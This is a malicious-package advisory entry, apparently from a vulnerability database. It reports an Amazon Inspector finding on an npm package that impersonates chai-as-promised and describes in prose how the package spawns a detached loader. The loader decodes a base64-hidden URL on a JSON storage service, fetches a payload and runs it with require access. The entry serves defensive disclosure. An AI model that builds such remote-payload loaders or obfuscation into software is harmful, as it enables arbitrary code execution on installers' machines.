MAL-2026-6219

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b6b32b714919c755532ed3d2695d1966568c24878e9721a5d756896d81881020) Package name impersonates the popular chai-as-promised assertion library, but its package.json description and keywords are copied from pino and the code is unrelated to chai. The package's main entry exports a middleware factory that spawns lib/caller.js as a detached node child process. lib/caller.js base64-decodes a hardcoded URL pointing at api.jsonstorage.net (a mutable third-party JSON storage service), GETs the JSON document, extracts the `cookie` field, and executes its contents via `new Function.constructor('require', s)(require)` with full access to `require`. The C2 URL and request headers are stored as base64 strings inside a locally redefined `process` object that shadows the real process global, then decoded with `atob` at runtime. Any consumer who installs and invokes the exported middleware triggers arbitrary attacker-controlled code execution; the attacker can rotate the payload served by the JSON storage endpoint at will.